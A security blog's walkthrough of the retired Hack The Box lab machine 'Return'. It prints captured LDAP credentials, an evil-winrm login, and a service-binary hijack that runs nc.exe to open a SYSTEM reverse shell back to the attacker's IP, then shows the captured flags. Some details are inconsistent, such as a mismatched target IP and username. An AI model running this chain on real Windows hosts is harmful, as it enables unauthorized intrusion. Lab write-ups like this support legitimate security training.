Return
| Name: | Return |
|---|---|
| Release Date: | 27 Sep 2021 |
| Retire Date: | 13 Oct 2021 |
| OS: | Windows/Other![]() |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: | ![]() |
| Radar Graph: | ![]() |
![]() |
HTB-Bot |
![]() |
HTB-Bot |
| Creator: | MrR3boot |
| Pentest Workshop PDF: | Return.pdf |
Security Blog, Rants, Raves, Write-ups, and Code

Security Blog, Rants, Raves, Write-ups, and Code
Return
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.108
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have a lot of port here, but we're only going to need ports LDAP TCP 389 and HTTP TCP 80. Navigating to http://10.10.11.108 gives us a Printer Admin Portal. Going to Settings, we see a method of getting credentials back by changing the server to our TUN0 IP address.




In a moment, we get back LDAP credentials:
svc_printer:1edFg43012!!
We should be able to evil-WinRM to the Printer:
evil-winrm -i 10.10.10.233 -u svc-printer -p '1edFg43012!!'

Now, we can run 'net user' to find what groups the svc-printer user is in. One of them is Server Operators which has elevated permissions to stop and start services. All we need to do is modify a service binary and we can get a reverse shell as SYSTEM. This is going to be an easy one!
upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1234"
sc.exe stop vss
sc.exe start vss
Once the first connection comes in, immediately run:
C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 1339
if we don't the shell will drop.





Every one of "The service did not respond" messages is a connection dropped, so definitely run the second netcat connection if you want a stable connection.
C:\Users\Administrator\Desktop>type C:\Users\svc-printer\Desktop\user.txt
type C:\Users\svc-printer\Desktop\user.txt
bc135298905d0a6caed5068d2636a8cd
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9346609076f90530e4f602592eabc680
Grab both flags and this box is done!
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.





